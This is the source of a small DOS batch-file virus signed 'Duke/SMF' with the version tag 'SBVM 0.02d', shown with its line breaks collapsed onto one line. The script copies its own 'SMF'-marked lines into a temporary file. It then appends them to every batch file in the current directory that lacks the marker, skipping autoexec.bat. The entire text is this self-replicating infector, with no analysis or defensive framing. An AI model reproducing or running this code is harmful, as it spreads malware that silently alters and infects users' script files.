@echo off %SMF% if -%1==-@ goto SMFz echo.>SMF.bat find "SMF"<%0>>SMF.bat for %%b in (*.bat) do call SMF.bat @ %%b del SMF.bat goto SMF :SMFz [SBVM 0.02d] if -%2==-autoexec.bat goto SMF find "SMF"<%2>nul if errorlevel 1 type SMF.bat>>%2 :SMF by Duke/SMF